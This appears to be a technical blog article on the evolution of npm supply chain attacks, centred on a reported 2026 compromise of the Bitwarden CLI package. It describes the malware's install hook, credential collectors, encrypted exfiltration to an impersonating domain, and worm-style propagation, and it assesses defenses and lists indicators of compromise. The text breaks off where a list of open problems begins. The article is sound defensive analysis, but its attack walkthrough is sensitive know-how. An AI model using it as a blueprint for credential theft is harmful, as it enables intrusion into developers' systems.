&lt;p&gt;At 6:15 PM on a Wednesday evening in April 2026, a developer on a platform team runs a routine command: &lt;code&gt;npm install -g @bitwarden/cli&lt;/code&gt;. They are setting up credential management for a new CI/CD pipeline. A script called &lt;code&gt;bw_setup.js&lt;/code&gt; silently downloads a runtime, scans their filesystem for every secret it can find -- AWS keys, GitHub tokens, SSH private keys, even their AI assistant&apos;s configuration -- encrypts the haul with AES-256-GCM, and ships it to a server impersonating a well-known security company.&lt;/p&gt;
&lt;p&gt;The package has valid provenance. The attestation checks out. npm says it is legitimate. It is not.&lt;/p&gt;

An attack that targets the software delivery pipeline rather than the final application directly. Instead of exploiting a vulnerability in your code, the attacker compromises a dependency, build tool, or distribution channel that you trust implicitly -- poisoning your software from the inside.
&lt;p&gt;Between 5:57 PM and 7:30 PM ET on April 22, 2026, the malicious &lt;code&gt;@bitwarden/cli@2026.4.0&lt;/code&gt; sat on the npm registry accepting installations [@bitwarden-statement]. In those 93 minutes, approximately 334 developers installed a password management tool that had been weaponized to steal their secrets [@jfrog-analysis]. The package attracted roughly 297,738 monthly downloads under normal circumstances -- meaning 250,000+ developers narrowly missed the window [@endor-labs].&lt;/p&gt;
&lt;p&gt;What was stolen from those 334 installs: AWS access keys, Azure service principals, GCP credentials, GitHub personal access tokens, npm publishing tokens, SSH private keys, shell history files, &lt;code&gt;.env&lt;/code&gt; files, and -- in a novel twist -- AI tool configurations including &lt;code&gt;.claude.json&lt;/code&gt;, &lt;code&gt;.kiro&lt;/code&gt;, and Cursor settings [@stepsecurity-bitwarden].&lt;/p&gt;

A mechanism where npm packages are published exclusively through CI/CD pipelines (like GitHub Actions) using short-lived OIDC tokens rather than long-lived npm access tokens. The package registry verifies that the publish request comes from an authorized workflow in the source repository, creating a cryptographic chain of trust from source code to published artifact.
&lt;p&gt;The deepest irony: this package used npm&apos;s newest and strongest trust mechanism -- trusted publishing via OIDC tokens [@stepsecurity-bitwarden]. The provenance attestation was valid because the build came from Bitwarden&apos;s own GitHub Actions workflow. The system worked exactly as designed. The problem was that the build pipeline itself had been compromised, and no downstream verification could detect that.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Trusted publishing guarantees that a package came from the expected build system. It does NOT guarantee that the build system itself is trustworthy. When the pipeline is the attack vector, provenance faithfully attests to a malicious build.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How did the most trusted publishing mechanism in npm&apos;s history become the vector for one of its most sophisticated attacks? The answer lies in a seven-year evolutionary arms race.&lt;/p&gt;
&lt;h2&gt;Historical Origins -- The Ancestry of npm Supply Chain Attacks&lt;/h2&gt;
&lt;p&gt;Supply chain attacks did not start sophisticated. They started with a typo.&lt;/p&gt;
&lt;p&gt;In 2017, an unknown threat actor registered a package called &lt;code&gt;crossenv&lt;/code&gt; -- a single missing hyphen away from the popular &lt;code&gt;cross-env&lt;/code&gt; build tool [@npm-crossenv]. Developers who mistyped the package name during installation silently handed their environment variables to a stranger. It was cheap, effective, and embarrassingly simple.The crossenv package was detected within days by security researchers who noticed the name similarity. But in those few days, it demonstrated something important: npm&apos;s open publishing model -- the same radical openness that enabled JavaScript&apos;s explosion -- also enabled trivial abuse.&lt;/p&gt;
&lt;p&gt;The npm community adapted. Detection tools began scanning for suspicious near-name packages. The door closed.&lt;/p&gt;
&lt;h3&gt;The Social Engineering Breakthrough (2018)&lt;/h3&gt;
&lt;p&gt;Then came &lt;code&gt;event-stream&lt;/code&gt;, and everything changed. In November 2018, developer Ayrton Sparling discovered that a Bitcoin-stealing backdoor had been injected into a widely-used package [@event-stream-issue]. The attack had not exploited any technical vulnerability. Instead, an attacker using the pseudonym &quot;right9ctrl&quot; had simply asked the package&apos;s burned-out maintainer, Dominic Tarr, if they could help maintain it [@snyk-event-stream].Dominic Tarr later explained his decision candidly. He had stopped using event-stream years earlier. The burden of maintaining popular open-source software with no compensation drove him to hand off control without due diligence. The community realized: open-source sustainability is a security problem.&lt;/p&gt;
&lt;p&gt;Tarr agreed. The attacker added a new dependency called &lt;code&gt;flatmap-stream&lt;/code&gt; containing code that specifically targeted the Copay cryptocurrency wallet. The malicious code lay dormant for months before discovery [@npm-event-stream].&lt;/p&gt;
&lt;p&gt;No security mechanism could have prevented this because it looked like legitimate maintainer succession. The problem was not just technical -- it was human.&lt;/p&gt;
&lt;h3&gt;The Algorithm Exploits (2021)&lt;/h3&gt;
&lt;p&gt;In February 2021, security researcher Alex Birsan demonstrated a fundamentally new attack class. He discovered that when companies use private internal package names, an attacker can publish identically-named packages to the public npm registry -- and the build system will fetch the attacker&apos;s version due to namespace priority resolution. He breached Apple, Microsoft, PayPal, and dozens of other companies, earning over $130,000 in bug bounties [@bleeping-dep-confusion].Birsan earned more in bug bounties from dependency confusion than many npm package maintainers earn in a year of maintaining the packages that millions depend on. The economic asymmetry between attack value and maintenance funding remains one of open source&apos;s unsolved problems.&lt;/p&gt;
&lt;p&gt;That same year, Codecov revealed that their Bash Uploader script -- used in thousands of CI/CD pipelines -- had been quietly exfiltrating environment variables to an attacker-controlled server since January 31 [@codecov-postmortem]. This was the first major open-source CI/CD tooling compromise to affect thousands of unrelated organizations&apos; pipelines at once [@codecov-postmortem] -- distinct from targeted build-pipeline attacks like SolarWinds that preceded it.&lt;/p&gt;
&lt;p&gt;Then in October, ua-parser-js -- one of npm&apos;s most downloaded packages -- was hijacked via a compromised maintainer account. Malicious versions containing cryptominers and credential stealers were published directly.&lt;/p&gt;

Notice the escalation: typosquatting exploited human typing errors. Dependency confusion exploited automated resolution logic. Account takeover exploited human credentials. Each attack found a different trust boundary to breach, and each defense closed one door while revealing the next one was unlocked.
&lt;p&gt;In January 2022, Marak Squires -- maintainer of colors.js and faker.js -- deliberately broke his own packages as protest against unpaid open-source labor [@colors-issue]. While not a traditional attack, it proved that even &quot;trusted&quot; publishers can become vectors when a single person controls what millions depend on.&lt;/p&gt;
&lt;p&gt;Each defense closed one door. But each closure revealed the next door was unlocked. The question became: what happens when attackers stop targeting the package and start targeting the pipeline that builds it?&lt;/p&gt;
&lt;h2&gt;The Evolution -- From Typosquatting to CI/CD Weaponization&lt;/h2&gt;
&lt;p&gt;The history of npm attacks reads like a predator-prey arms race. Every defense pushes the attacker one trust boundary upstream -- from package names, to registry resolution, to maintainer accounts, to the build system itself.&lt;/p&gt;

gantt
    title npm Supply Chain Attack Evolution (2017-2026)
    dateFormat YYYY
    axisFormat %Y
    section Generation 1
    Typosquatting (crossenv)           :2017, 2019
    section Generation 2
    Dependency Confusion (Birsan)      :2021, 2022
    section Generation 3
    Account Takeover (ua-parser-js)    :2021, 2023
    section Generation 4
    CI/CD Poisoning (Codecov -&amp;gt; tj-actions) :2021, 2025
    section Generation 5
    Self-Propagating Worm (Shai-Hulud) :2025, 2026

An attack that exploits package manager resolution priority. When an organization uses private package names without namespace scoping, an attacker publishes identically-named packages to the public registry with higher version numbers. Build systems fetch the attacker&apos;s public package over the legitimate private one.
&lt;p&gt;Here is how each generation escalated:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Attack Vector&lt;/th&gt;
&lt;th&gt;Blast Radius&lt;/th&gt;
&lt;th&gt;Detection Difficulty&lt;/th&gt;
&lt;th&gt;Defense That Stopped It&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1: Typosquatting (2017)&lt;/td&gt;
&lt;td&gt;Human typos&lt;/td&gt;
&lt;td&gt;Individual developers&lt;/td&gt;
&lt;td&gt;Low -- name similarity&lt;/td&gt;
&lt;td&gt;Automated name scanning&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2: Dependency Confusion (2021)&lt;/td&gt;
&lt;td&gt;Registry resolution logic&lt;/td&gt;
&lt;td&gt;Targeted organizations&lt;/td&gt;
&lt;td&gt;Medium -- internal names&lt;/td&gt;
&lt;td&gt;Scoped packages, registry config&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3: Account Takeover (2021-2023)&lt;/td&gt;
&lt;td&gt;Stolen credentials&lt;/td&gt;
&lt;td&gt;All package consumers&lt;/td&gt;
&lt;td&gt;High -- legitimate identity&lt;/td&gt;
&lt;td&gt;MFA mandates, provenance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4: CI/CD Poisoning (2021-2025)&lt;/td&gt;
&lt;td&gt;Build pipeline compromise&lt;/td&gt;
&lt;td&gt;All downstream consumers&lt;/td&gt;
&lt;td&gt;Very high -- valid attestation&lt;/td&gt;
&lt;td&gt;SHA pinning, runtime monitoring&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5: Self-Propagating Worm (2025-2026)&lt;/td&gt;
&lt;td&gt;Automated credential theft + re-publish&lt;/td&gt;
&lt;td&gt;Exponential (registry-wide)&lt;/td&gt;
&lt;td&gt;Extreme -- self-sustaining&lt;/td&gt;
&lt;td&gt;Detection speed + credential ephemerality&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The bridge insight connecting every generation: each defense pushes attackers to target the next trust boundary upstream. Automated name scanning stopped typosquatting. Scoped packages stopped dependency confusion. MFA stopped account takeover. That left one target: the CI/CD pipeline that sits &lt;em&gt;above&lt;/em&gt; all these defenses.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Each generation of npm supply chain attack exploits the trust boundary that the previous generation&apos;s defense created. When you protect the package name, attackers target the registry. When you protect the registry, they target the maintainer. When you protect the maintainer, they target the build system. The attack surface is not the package -- it is the chain of trust itself.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Generation 4 struck in March 2025 when the widely-used GitHub Action &lt;code&gt;tj-actions/changed-files&lt;/code&gt; was compromised [@cisa-tj-actions]. An attacker obtained a Personal Access Token, then retroactively modified all Git tags (v1 through v45.0.7) to point to a malicious commit. Over 23,000 repositories that referenced this action by tag suddenly pulled compromised code that dumped CI runner secrets to workflow logs [@wiz-tj-actions].&lt;/p&gt;
&lt;p&gt;The attack proved that mutable Git tags -- the standard way developers reference GitHub Actions -- create a massive attack surface. Any previously-pinned tag reference could be silently redirected.&lt;/p&gt;
&lt;p&gt;But Generations 4 and 5 converged in a single attack that combined CI/CD poisoning, trusted publishing abuse, and self-propagation. That attack has a name: Shai-Hulud, The Third Coming -- the malware&apos;s own self-designation [@endor-labs], though formal attribution of all three iterations to the same threat actor remains unconfirmed [@jfrog-analysis].&lt;/p&gt;
&lt;h2&gt;The Breakthrough -- Shai-Hulud and Self-Propagating Worms&lt;/h2&gt;
&lt;p&gt;In September 2025, Checkmarx researchers discovered something unprecedented: an npm worm that did not just compromise one package -- it used stolen credentials to automatically infect every other package its victim maintained [@checkmarx-shai-hulud].&lt;/p&gt;

First self-replicating supply chain attack, which uses GitHub Actions to infect repositories that consume any previously-infected package -- Checkmarx Supply Chain Security [@checkmarx-shai-hulud]

A type of malware that spreads autonomously without further attacker interaction. In the npm context, a self-propagating worm harvests publishing credentials from one victim, then uses those credentials to inject itself into all packages that victim controls -- turning each new victim into a new attack vector in a cascading chain.
&lt;p&gt;The worm was named Shai-Hulud -- the Fremen name for the giant sandworms of Frank Herbert&apos;s Dune.The Shai-Hulud name itself came from Dune. Later TeamPCP infrastructure in the Bitwarden incident used additional Dune-themed terms such as sardaukar, fremen, atreides, and sandworm for fallback exfiltration repositories [@jfrog-analysis].&lt;/p&gt;
&lt;h3&gt;Shai-Hulud 1.0 (September 2025)&lt;/h3&gt;
&lt;p&gt;The first iteration compromised nearly 200 unique packages across roughly 600 infected versions by harvesting npm and GitHub credentials, then automatically republishing infected packages under the victim&apos;s own maintainer identity [@checkmarx-shai-hulud]. A separate &lt;code&gt;npmjs[.]help&lt;/code&gt; phishing campaign hit the system days earlier, but Shai-Hulud&apos;s propagation mechanism was automated token theft and republishing. Once credentials were harvested, the worm:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Downloaded, infected, and republished every package the victim could publish&lt;/li&gt;
&lt;li&gt;Used TruffleHog-style credential scanning to find additional tokens&lt;/li&gt;
&lt;li&gt;Exfiltrated data to attacker-controlled GitHub repositories&lt;/li&gt;
&lt;li&gt;Injected malicious GitHub Actions workflows for persistence&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Each newly infected package repeated the cycle. One compromised maintainer&apos;s packages infected all their consumers&apos; packages -- exponential propagation [@reversinglabs-shai-hulud].&lt;/p&gt;
&lt;h3&gt;Shai-Hulud 2.0 (November 2025)&lt;/h3&gt;
&lt;p&gt;About ten weeks later, on November 24, 2025, the second iteration hit harder: 796 unique packages compromised, affecting over 20 million weekly downloads [@datadog-shai-hulud]. High-profile targets included Zapier, PostHog, and Postman packages [@microsoft-shai-hulud]. Microsoft later published detection guidance including Defender for Cloud alerts and hunting queries for &lt;code&gt;setup_bun.js&lt;/code&gt; and &lt;code&gt;bun_environment.js&lt;/code&gt; patterns.&lt;/p&gt;

flowchart TD
    A[Initial Compromise&lt;br /&gt;Stolen maintainer tokens] --&amp;gt; B[Credential Harvesting&lt;br /&gt;npm tokens, GitHub PATs, SSH keys]
    B --&amp;gt; C[Package Infection&lt;br /&gt;Inject malicious postinstall into&lt;br /&gt;all victim-owned packages]
    C --&amp;gt; D[New Victims Install&lt;br /&gt;Infected packages]
    D --&amp;gt; B
    B --&amp;gt; E[GitHub Persistence&lt;br /&gt;Inject malicious workflows&lt;br /&gt;into victim repositories]
    E --&amp;gt; F[CI/CD Runners&lt;br /&gt;Harvest ACTIONS_RUNTIME_TOKEN&lt;br /&gt;and runner secrets]
    F --&amp;gt; B

Threat intelligence firm Dataminr reported a &quot;confirmed operational relationship between TeamPCP and the Vect ransomware-as-a-service (RaaS) operation&quot; [@dataminr-teampcp]. This assessment is based on infrastructure overlap and shared tooling, not law enforcement attribution. The connection suggests that supply chain attacks against developer tools are being weaponized by organized cybercrime groups, not just individual actors or nation-states.
&lt;p&gt;Shai-Hulud 1.0 and 2.0 were devastating but impersonal -- they hit whatever packages their victims happened to maintain. The third iteration would be different. It would target a specific, high-value package with surgical precision.&lt;/p&gt;
&lt;h2&gt;Anatomy of the Attack -- Bitwarden CLI @2026.4.0&lt;/h2&gt;
&lt;p&gt;At 5:57 PM ET on April 22, 2026, npm&apos;s registry accepted a new publish of &lt;code&gt;@bitwarden/cli&lt;/code&gt; version 2026.4.0. The provenance attestation was valid. The source was Bitwarden&apos;s own GitHub Actions workflow. Everything looked legitimate. Everything was compromised.&lt;/p&gt;

The malicious package was briefly distributed through the npm delivery path for @bitwarden/cli@2026.4.0 between 5:57 PM and 7:30 PM (ET) on April 22, 2026 -- Bitwarden Security Team [@bitwarden-statement]

A cryptographically signed record that links a published npm package to its source repository, build workflow, and commit SHA. Generated during npm publish using Sigstore&apos;s Fulcio certificate authority and recorded in the Rekor transparency log. Provenance tells you WHERE a package came from, not WHETHER the source code is safe.
&lt;h3&gt;Phase 1: Initial Access&lt;/h3&gt;
&lt;p&gt;Two different analyses describe the initial access from complementary angles. Endor Labs attributes the CI/CD compromise to a poisoned third-party GitHub Action -- &lt;code&gt;checkmarx/ast-github-action&lt;/code&gt; -- which had been compromised as part of the broader TeamPCP campaign and was present in Bitwarden&apos;s CI/CD workflow [@endor-labs]. StepSecurity&apos;s deeper analysis reveals that a Bitwarden engineer&apos;s GitHub account was compromised, allowing the attacker to create a new branch, stage a prebuilt malicious tarball, and rewrite the &lt;code&gt;publish-cli.yml&lt;/code&gt; workflow to exchange a GitHub Actions OIDC token for an npm auth token [@stepsecurity-bitwarden].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; These accounts likely describe complementary stages of the same attack: the compromised Checkmarx action may have provided the initial credential that led to the engineer&apos;s account compromise, which then enabled the workflow rewrite. The key takeaway is that the attacker gained write access to the publish workflow itself.&lt;/p&gt;
&lt;/blockquote&gt;

A mechanism where GitHub Actions workflows request short-lived tokens from an OpenID Connect identity provider. For npm trusted publishing, the workflow proves its identity to npm&apos;s registry without storing any long-lived secrets. The registry trusts the token because it trusts GitHub&apos;s OIDC provider -- creating a chain of trust that breaks if the workflow itself is compromised.
&lt;p&gt;When Bitwarden&apos;s CI/CD pipeline ran its publish workflow, the attacker&apos;s modifications injected two files into the build: &lt;code&gt;bw_setup.js&lt;/code&gt; and &lt;code&gt;bw1.js&lt;/code&gt; [@jfrog-analysis]. Because the publish used OIDC trusted publishing, the resulting package carried valid provenance -- npm had no reason to reject it.&lt;/p&gt;

First confirmed supply chain attack where npm&apos;s OIDC Trusted Publishing was used to publish a compromised package -- StepSecurity [@stepsecurity-bitwarden]
&lt;h3&gt;Phase 2: Payload Execution&lt;/h3&gt;
&lt;p&gt;When a victim ran &lt;code&gt;npm install -g @bitwarden/cli@2026.4.0&lt;/code&gt;, the &lt;code&gt;preinstall&lt;/code&gt; hook triggered &lt;code&gt;bw_setup.js&lt;/code&gt;, which immediately downloaded the Bun runtime for fast JavaScript execution [@jfrog-analysis]. Then &lt;code&gt;bw1.js&lt;/code&gt; executed three parallel collector routines:&lt;/p&gt;

sequenceDiagram
    participant Dev as Developer
    participant npm as npm Registry
    participant BW as @bitwarden/cli@2026.4.0
    participant Bun as Bun Runtime
    participant C2 as audit.checkmarx[.]cx
    participant GH as GitHub Repos (fallback)&lt;pre&gt;&lt;code&gt;Dev-&amp;gt;&amp;gt;npm: npm install -g @bitwarden/cli
npm-&amp;gt;&amp;gt;Dev: Package with valid provenance
Dev-&amp;gt;&amp;gt;BW: preinstall hook triggers bw_setup.js
BW-&amp;gt;&amp;gt;Bun: Download Bun runtime
Bun-&amp;gt;&amp;gt;BW: Ready
BW-&amp;gt;&amp;gt;BW: Execute bw1.js collectors
Note over BW: Filesystem: SSH keys, .npmrc, .env, AI configs
Note over BW: Environment: shell history, cloud creds
Note over BW: CI Runner: ACTIONS_RUNTIME_TOKEN, secrets
BW-&amp;gt;&amp;gt;BW: AES-256-GCM encrypt collected data
BW-&amp;gt;&amp;gt;C2: POST encrypted payload
alt Primary C2 fails
    BW-&amp;gt;&amp;gt;GH: Commit to Dune-themed repos
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Filesystem collector:&lt;/strong&gt; Scanned for SSH keys (&lt;code&gt;~/.ssh/&lt;/code&gt;), npm tokens (&lt;code&gt;~/.npmrc&lt;/code&gt;), environment files (&lt;code&gt;.env&lt;/code&gt;), cloud provider credential files, and -- notably -- AI tool configurations including &lt;code&gt;.claude.json&lt;/code&gt;, &lt;code&gt;.kiro&lt;/code&gt;, and Cursor settings [@paloalto-bitwarden].The targeting of AI tool configurations (.claude.json, .kiro, Cursor) is novel -- it suggests awareness that developers increasingly store API keys and authentication tokens in AI assistant configs. As AI-assisted development grows, these configs become high-value targets containing keys to multiple services.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Shell and environment collector:&lt;/strong&gt; Harvested shell history files (which often contain pasted tokens and passwords), environment variables, and cloud provider credentials for AWS, Azure, and GCP [@jfrog-analysis].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;GitHub Actions runner collector:&lt;/strong&gt; When running on a CI/CD runner, harvested the &lt;code&gt;ACTIONS_RUNTIME_TOKEN&lt;/code&gt;, runner secrets, and workflow-level variables [@stepsecurity-bitwarden].&lt;/p&gt;
&lt;h3&gt;Phase 3: Exfiltration and Self-Propagation&lt;/h3&gt;
&lt;p&gt;All collected data was encrypted with AES-256-GCM and POSTed to &lt;code&gt;audit.checkmarx[.]cx&lt;/code&gt; -- a domain impersonating the legitimate security company Checkmarx [@jfrog-analysis]. If the primary command-and-control server was unreachable, the malware fell back to committing encrypted data to GitHub repositories with Dune-themed names (sardaukar, fremen, atreides, sandworm) using stolen GitHub tokens.The malware includes a locale check that skips execution if the system has Russian language configured -- a common tactic by Russian-origin threat actors to avoid domestic prosecution under Russian law [@ox-security].&lt;/p&gt;
&lt;p&gt;Stolen GitHub tokens were then used to inject malicious workflows into victim repositories, creating persistence and enabling further propagation. This self-propagation mechanism -- the hallmark of the Shai-Hulud campaign -- meant each compromised developer potentially infected their entire organization&apos;s codebase.&lt;/p&gt;
&lt;h3&gt;Detection and Takedown&lt;/h3&gt;
&lt;p&gt;The attack lasted 93 minutes. Socket, JFrog, OX Security, and StepSecurity independently detected the compromise [@ox-security, @stepsecurity-bitwarden, @bleeping-bitwarden]. The malicious version was unpublished, and Bitwarden issued their official statement the following day confirming no vault data or production systems were affected [@bitwarden-statement].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; You must assume ALL credentials accessible from your machine or CI runner are compromised. Rotate immediately: AWS access keys, Azure service principals, GCP service accounts, GitHub PATs, npm tokens, and SSH keys. Check your repositories for unauthorized workflow files. Search for &lt;code&gt;bw_setup.js&lt;/code&gt;, &lt;code&gt;bw1.js&lt;/code&gt;, or connections to &lt;code&gt;audit.checkmarx[.]cx&lt;/code&gt; in your logs.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The attack brilliantly exploited trust -- but could existing defenses have caught it? The answer reveals uncomfortable gaps in current security tooling.&lt;/p&gt;
&lt;h2&gt;State of the Art -- Defenses and Their Limits&lt;/h2&gt;
&lt;p&gt;Six major approaches exist to defend against supply chain attacks. Against the Bitwarden compromise, most of them failed -- not because they are bad tools, but because they were designed for a previous generation of attacks.&lt;/p&gt;
&lt;h3&gt;npm Provenance and SLSA&lt;/h3&gt;

A security framework that defines increasing levels of supply chain integrity. The Build Track specifies four levels: L0 (no requirements), L1 (provenance exists), L2 (signed provenance from a hosted build platform), and L3 (a hardened build platform that resists tampering during the build). SLSA addresses build integrity but not source code safety [@slsa-levels].
&lt;p&gt;npm provenance creates a cryptographic chain from source repository to published package via Sigstore&apos;s transparency log. Consumers verify via &lt;code&gt;npm audit signatures&lt;/code&gt; that a package was built from the expected source by the expected workflow.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Against the Bitwarden attack: FAILED.&lt;/strong&gt; Provenance was bypassed because the CI/CD pipeline itself was compromised. The attestation correctly recorded that the package came from Bitwarden&apos;s GitHub Actions workflow and their source repository. The provenance was technically &lt;em&gt;valid&lt;/em&gt; -- it just attested to a malicious build [@stepsecurity-bitwarden].&lt;/p&gt;
&lt;h3&gt;Behavioral Analysis (Socket)&lt;/h3&gt;
&lt;p&gt;Socket performs static and dynamic analysis of package behavior at publish time -- scanning for risky API usage, unexpected network connections, obfuscated code, and anomalous file system access.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Against the Bitwarden attack: WOULD DETECT.&lt;/strong&gt; The malicious &lt;code&gt;bw_setup.js&lt;/code&gt; downloading Bun, scanning for credentials, and making outbound POST requests to &lt;code&gt;audit.checkmarx[.]cx&lt;/code&gt; would trigger multiple behavioral alerts [@bleeping-bitwarden].&lt;/p&gt;
&lt;h3&gt;CI/CD Runtime Monitoring (StepSecurity Harden-Runner)&lt;/h3&gt;
&lt;p&gt;Harden-Runner monitors GitHub Actions workflows at runtime -- tracking outbound network connections, process execution, and file access against configured allow-lists.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Against the Bitwarden attack: WOULD DETECT.&lt;/strong&gt; The poisoned action making unauthorized outbound connections to attacker infrastructure would violate network policies. StepSecurity was among the first to detect and report the compromise [@stepsecurity-bitwarden].&lt;/p&gt;
&lt;h3&gt;Lockfile Integrity&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;npm ci&lt;/code&gt; enforces strict lockfile adherence with SHA-512 hash verification. The &lt;code&gt;--ignore-scripts&lt;/code&gt; flag prevents execution of install hooks.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Against the Bitwarden attack: PARTIAL.&lt;/strong&gt; For consumers who pinned the exact previous version, their lockfile hash would not match the new malicious version. However, anyone running &lt;code&gt;npm update&lt;/code&gt; or installing fresh would get the compromised version. The &lt;code&gt;--ignore-scripts&lt;/code&gt; flag would have prevented payload execution entirely -- but breaks many legitimate packages that need native compilation.&lt;/p&gt;
&lt;h3&gt;SCA Tools (JFrog, Snyk)&lt;/h3&gt;
&lt;p&gt;Software Composition Analysis tools match packages against known-malicious databases and real-time threat feeds.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Against the Bitwarden attack: DETECTED within 90 minutes.&lt;/strong&gt; JFrog&apos;s real-time analysis identified the malicious payload during the attack window, contributing to the 93-minute takedown [@jfrog-analysis].&lt;/p&gt;
&lt;h3&gt;GitHub Actions SHA Pinning&lt;/h3&gt;
&lt;p&gt;Pinning actions by commit SHA rather than mutable tag prevents tag-swapping attacks.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Against the Bitwarden attack: COMPLEX.&lt;/strong&gt; Under the Endor Labs narrative (poisoned third-party &lt;code&gt;checkmarx/ast-github-action&lt;/code&gt;), SHA pinning of that action WOULD have prevented the initial compromise. Under the StepSecurity narrative (direct engineer account compromise allowing workflow rewrite), SHA pinning would be moot because the attacker could modify the workflow file itself [@cisa-tj-actions]. Either way, SHA pinning remains critical defense against the broader class of tag-swapping attacks demonstrated by tj-actions.&lt;/p&gt;

flowchart LR
    subgraph Attacks
        T[Typosquatting]
        DC[Dependency Confusion]
        AT[Account Takeover]
        CP[CI/CD Poisoning]
        SW[Self-Propagating Worm]
    end
    subgraph Defenses
        NS[Name Scanning]
        LF[Lockfile + Scoped Pkgs]
        MFA[MFA + Provenance]
        SHA[SHA Pinning]
        BA[Behavioral Analysis]
        RM[Runtime Monitoring]
    end
    NS -.-&amp;gt;|blocks| T
    LF -.-&amp;gt;|blocks| DC
    MFA -.-&amp;gt;|blocks| AT
    SHA -.-&amp;gt;|partially blocks| CP
    BA -.-&amp;gt;|detects| CP
    BA -.-&amp;gt;|detects| SW
    RM -.-&amp;gt;|detects| CP
    RM -.-&amp;gt;|detects| SW
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; No single defensive tool would have prevented this attack alone. Only a combination of behavioral analysis (detecting the payload) AND CI/CD runtime monitoring (detecting unauthorized network activity) could have stopped it before exfiltration. The attack was designed to slip through any one layer of defense.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Even layered defenses have theoretical limits. Some of those limits are mathematical, not merely practical.&lt;/p&gt;
&lt;h2&gt;Theoretical Limits -- Why Perfect Prevention Is Impossible&lt;/h2&gt;
&lt;p&gt;Here is an uncomfortable truth from computer science: perfect malware detection is provably impossible.&lt;/p&gt;

A 1953 result in computability theory proving that no algorithm can decide all non-trivial semantic properties of programs. Applied to security: no static analysis tool can determine with certainty whether an arbitrary program will exhibit malicious behavior for all possible inputs. Perfect malware detection is undecidable -- there will always be programs that evade any fixed detection strategy.
&lt;p&gt;Rice&apos;s Theorem (1953) guarantees that no algorithm can determine whether an arbitrary program exhibits malicious behavior. This is not a limitation of current tools -- it is a mathematical impossibility. Any behavioral detection system must either accept false negatives (missing some malware) or false positives (flagging safe programs).&lt;/p&gt;
&lt;h3&gt;The Trusting Trust Problem&lt;/h3&gt;
&lt;p&gt;In 1984, Ken Thompson -- co-creator of Unix -- delivered his Turing Award lecture with a devastating demonstration [@thompson-trust]. He showed that a compiler could be modified to inject backdoors into programs it compiled, and then modified to inject the backdoor into &lt;em&gt;itself&lt;/em&gt; when recompiled from clean source.Thompson&apos;s demonstration revealed that you cannot fully trust any software by examining its source code alone -- the compiler that builds it could be compromised, and the compiler that builds the compiler, ad infinitum. He concluded: &quot;You can&apos;t trust code that you did not totally create yourself. (Especially code from companies who employ people like me.)&quot; The Bitwarden attack is the modern manifestation of Thompson&apos;s insight applied to CI/CD pipelines.&lt;/p&gt;
&lt;p&gt;The implication is direct: the CI/CD pipeline that builds your package is itself software, built by other software, running on systems maintained by other systems. The verification chain is infinitely recursive. You cannot fully verify the tools that verify the tools.&lt;/p&gt;
&lt;h3&gt;The Provenance Paradox&lt;/h3&gt;
&lt;p&gt;Provenance attestation guarantees one thing: this package was built from this source by this system. It does NOT guarantee that the source code is safe, that the build system is trustworthy, or that no intermediate step was compromised.&lt;/p&gt;
&lt;p&gt;$$\text{Provenance} \Rightarrow \text{Source} \rightarrow \text{Build Integrity}$$
$$\text{Provenance} \not\Rightarrow \text{Code Safety}$$&lt;/p&gt;
&lt;p&gt;When the source repository itself contains malicious code injected via a compromised CI/CD pipeline (as in the Bitwarden attack), provenance faithfully attests to the malicious build. The attestation is &lt;em&gt;correct&lt;/em&gt; -- it just does not mean what we assumed it meant.&lt;/p&gt;

The npm registry hosts millions of packages. Even if 99.99% are safe, that leaves hundreds of potential attack vectors. At current growth rates, the attack surface expands faster than any detection system can keep pace.
&lt;h3&gt;What This Means for Defenders&lt;/h3&gt;
&lt;p&gt;The practical consequence: security cannot be achieved through any single verification layer. The Bitwarden attack exploited the gap between what provenance &lt;em&gt;proves&lt;/em&gt; (build integrity) and what developers &lt;em&gt;assume&lt;/em&gt; it proves (code safety). Closing that gap requires defense in depth -- multiple independent detection mechanisms that each catch what the others miss.&lt;/p&gt;
&lt;p&gt;If perfection is impossible, what problems are worth solving next?&lt;/p&gt;
&lt;h2&gt;Open Problems -- The Research Frontier&lt;/h2&gt;
&lt;p&gt;The Bitwarden attack exposed five unsolved problems that no current tool adequately addresses.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Detecting compromised first-party CI/CD pipelines before artifact publication.&lt;/strong&gt;&lt;/p&gt;
